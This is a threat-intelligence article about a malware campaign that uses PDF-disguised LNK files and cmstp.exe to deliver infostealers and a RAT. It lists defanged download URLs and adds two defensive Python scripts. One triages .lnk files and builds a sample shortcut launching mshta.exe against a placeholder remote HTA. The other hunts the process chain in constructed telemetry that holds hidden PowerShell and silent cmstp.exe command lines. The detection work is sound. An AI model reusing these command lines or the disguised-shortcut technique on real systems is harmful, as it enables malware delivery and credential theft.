Threat actors have shifted from malicious macros to malicious LNK (Windows shortcut) files for initial access. The shift follows Microsoft's 2022 decision to block macros by default in Office documents downloaded from the internet or from untrusted sources.
The current attack vector abuses the Microsoft Connection Manager Profile Installer, cmstp.exe, a signed Windows binary that installs connection profiles from INF files and can be made to proxy the execution of malicious payloads.
The campaign was found to be similar to the Invicta stealer infection method, although the infection chain varies, which indicates that the threat actors have changed their TTPs (Tactics, Techniques, and Procedures).
In most cases, the LNK file that starts the remote VBScript infection is distributed via spam emails as a legitimate-looking attachment, typically a ZIP or ISO archive.
LNK Files to Exploit Microsoft Connection Manager Profile
The infection begins when the victim opens a downloaded ZIP file that contains an LNK file disguised as a PDF. Opening the shortcut triggers the remote execution of a .hta file hosted on a remote server.
Once the .hta file runs, it downloads a heavily obfuscated VBScript. When executed, the VBScript de-obfuscates and launches an embedded PowerShell loader, which then acts as a PowerShell downloader.
This PowerShell downloader fetches the malware files from two URLs:
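The following is an added example, not code from Cyble's report or from Cyber Security News: a small Python triage script that parses the 76-byte header and the string data of a .lnk file (MS-SHLLINK format) and flags the traits a shortcut disguised as a PDF typically shows, namely a document-style double extension, a script host or LOLBin as the target, a remote URL in the arguments, and a window that is minimised on launch. The sample shortcut it builds is constructed for the demonstration; its target (mshta.exe), the placeholder host example.invalid and the file names are assumptions, not indicators from this campaign.

```python
"""Static triage of a Windows .lnk file (MS-SHLLINK format).

Parses the 76-byte ShellLinkHeader and the StringData section, then flags the
indicators a disguised shortcut tends to carry: a document-style double
extension, a script host or LOLBin target, a remote URL in the arguments and
a minimised window. Added example; the sample below is constructed.
"""
import re
import struct

HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046}, the ShellLink CLSID, in on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# size, clsid, flags, attrs, 3 timestamps, filesize, icon index, showcmd, hotkey, 3 reserved
HEADER_FMT = "<I16sIIQQQIIIHHII"

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))  # fixed on-disk order

SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window minimised
LOLBIN_TARGETS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                  "cmd.exe", "cmstp.exe", "rundll32.exe", "regsvr32.exe")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
DOC_DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?)\.lnk$", re.IGNORECASE)


def _counted_string(buf, off, unicode):
    """StringData item: uint16 character count followed by the characters."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        return buf[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return buf[off:off + count].decode("latin-1"), off + count


def parse_lnk(buf):
    fields = struct.unpack_from(HEADER_FMT, buf, 0)
    size, clsid, flags, show_cmd = fields[0], fields[1], fields[2], fields[9]
    if size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # skipped: shell item IDs are not decoded here
        (id_list_size,) = struct.unpack_from("<H", buf, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:                # skipped: first dword is the structure's size
        (link_info_size,) = struct.unpack_from("<I", buf, off)
        off += link_info_size
    info = {"flags": flags, "show_command": show_cmd}
    unicode = bool(flags & IS_UNICODE)
    for key, bit in STRING_FIELDS:
        info[key] = ""
        if flags & bit:
            info[key], off = _counted_string(buf, off, unicode)
    return info


def triage(buf, filename=""):
    """Returns a list of human-readable findings; an empty list means nothing suspicious."""
    info = parse_lnk(buf)
    findings = []
    if DOC_DOUBLE_EXT.search(filename):
        findings.append(f"document-style double extension: {filename}")
    if info["relative_path"].lower().endswith(LOLBIN_TARGETS):
        findings.append(f"script host / LOLBin target: {info['relative_path']}")
    if URL_RE.search(info["arguments"]):
        findings.append(f"remote URL in arguments: {info['arguments']}")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window minimised on launch (SW_SHOWMINNOACTIVE)")
    return findings


def build_lnk(relative_path, arguments="", name="", show_cmd=1):
    """Builds a minimal unicode .lnk (no IDList, no LinkInfo) so the triage can run offline."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | (HAS_ARGUMENTS if arguments else 0) | (HAS_NAME if name else 0)
    header = struct.pack(HEADER_FMT, HEADER_SIZE, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)

    def counted(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + (counted(name) if name else b"") + counted(relative_path) + (counted(arguments) if arguments else b"")


# Constructed sample: a shortcut named like a PDF that points mshta.exe at a remote HTA.
# The host is a reserved, non-resolving placeholder, not an indicator from the campaign.
SAMPLE_FILENAME = "Invoice.pdf.lnk"
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                       arguments="http://example.invalid/stage1.hta",
                       name="Invoice", show_cmd=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for line in triage(SAMPLE_LNK, SAMPLE_FILENAME):
        print("[!]", line)
```

Real shortcuts usually carry a LinkTargetIDList rather than a relative path; the parser skips that structure, so for those files the target has to be recovered from the ID list with a fuller tool, while the arguments, show command and file name checks still apply.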
hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe
Both files are saved in the AppData\Roaming directory under their original names: one is a PDF and the other is an EXE, the Redline stealer executable. The PowerShell downloader then uses cmstp.exe to bypass UAC (User Account Control).
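As an added example for defenders (not part of the Cyble report or of this article), the Python below reconstructs a process tree from Sysmon-style process-creation events (Event ID 1 field names) and flags the chain described above: a script host launched from Explorer with a remote URL, script hosts spawning one another, and cmstp.exe run with /ni /s against an INF file, rated higher when that INF sits in a user-writable location such as AppData. The events are constructed; the paths, PIDs, command lines and the example.invalid host are assumptions, not telemetry from this campaign.

```python
"""Hunting the LNK -> HTA -> VBScript -> PowerShell -> cmstp.exe chain in
process-creation telemetry. Events use Sysmon Event ID 1 field names and are
reconstructed into a parent/child tree so each hit carries its full ancestry.
Added example; the sample events below are constructed, not real telemetry.
"""
import re

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# cmstp.exe /ni /s <profile.inf> installs a Connection Manager profile silently; the INF can
# carry commands that cmstp.exe runs on the attacker's behalf (ATT&CK T1218.003).
CMSTP_SILENT_INF = re.compile(r"(?=.*\s/ni\b)(?=.*\s/s\b).*\.inf\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid):
    """Image names from the process itself up to the root we have telemetry for."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain


def hunt(events):
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for ev in events:
        img, cmd = image_name(ev["Image"]), ev["CommandLine"]
        chain = ancestry(by_pid, ev["ProcessId"])
        parent = chain[1] if len(chain) > 1 else ""
        hit = None
        if img == "cmstp.exe" and CMSTP_SILENT_INF.search(cmd):
            writable = bool(USER_WRITABLE.search(cmd))
            hit = ("high" if writable else "medium",
                   "cmstp.exe silent INF install" + (" from a user-writable path" if writable else ""))
        elif img == "mshta.exe" and URL_RE.search(cmd) and parent == "explorer.exe":
            hit = ("medium", "mshta.exe with a remote URL launched from explorer.exe (double-clicked shortcut pattern)")
        elif img in SCRIPT_HOSTS and parent in SCRIPT_HOSTS:
            hit = ("medium", f"script host {img} spawned by script host {parent}")
        if hit:
            findings.append({"severity": hit[0], "pid": ev["ProcessId"], "rule": hit[1], "chain": chain})
    return findings


# Constructed events: the described chain plus two benign lookalikes (an interactive
# profile install and an interactive PowerShell session) that must not fire.
SAMPLE_EVENTS = [
    {"ProcessId": 4000, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 4100, "ParentProcessId": 4000, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/stage1.hta"},
    {"ProcessId": 4200, "ParentProcessId": 4100, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //B C:\Users\u\AppData\Local\Temp\stage2.vbs"},
    {"ProcessId": 4300, "ParentProcessId": 4200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -f stage3.ps1"},
    {"ProcessId": 4400, "ParentProcessId": 4300, "Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /ni /s C:\Users\u\AppData\Roaming\profile.inf"},
    {"ProcessId": 5000, "ParentProcessId": 4000, "Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe C:\ProgramData\CorpVPN\corpvpn.inf"},
    {"ProcessId": 5100, "ParentProcessId": 4000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid {f['pid']}: {f['rule']} | " + " <- ".join(f["chain"]))
```

The ancestry is the useful part of each hit: a single cmstp.exe /ni /s event is ambiguous on its own, but one whose parents are powershell.exe, wscript.exe and mshta.exe under explorer.exe is the chain this article describes and worth an immediate host pull.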
Weaponized LNK Files Uncovered
According to the report shared with Cyber Security News, the payloads delivered by the weaponized LNK files were identified as Blank Grabber, Redline Stealer, and NetSupport RAT.
Blank Grabber is an open-source, Python-based stealer with a GUI builder that makes generating stealer payloads easy. It also offers customization options such as a custom icon, UAC bypass, and persistence at startup.
Redline Stealer is sold on cybercrime forums and is one of the most prominent infostealers in circulation. It is used to steal sensitive information such as passwords and login credentials, browser autofill data, and credit card details.
NetSupport RAT is a commercial remote-administration tool that administrators use for legitimate remote access, but threat actors misuse it to gain unauthorized access to victim systems.
Furthermore, Cyble researchers have published a complete report with detailed information on the obfuscation, the attack vector, YARA rules, and other indicators.